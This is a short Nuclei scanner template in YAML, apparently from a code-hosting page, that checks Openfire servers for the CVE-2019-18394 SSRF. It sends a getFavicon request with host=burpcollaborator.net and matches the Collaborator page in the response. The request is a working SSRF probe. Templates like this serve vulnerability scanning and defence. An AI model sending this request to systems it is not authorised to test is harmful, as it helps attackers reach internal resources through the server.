17 lines
381 B
YAML
17 lines
381 B
YAML
id: cve-2019-18394
|
|
|
|
info:
|
|
name: Openfire Full Read SSRF
|
|
author: pdteam - nuclei.projectdiscovery.io
|
|
severity: critical
|
|
|
|
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- <h1>Burp Collaborator Server</h1> |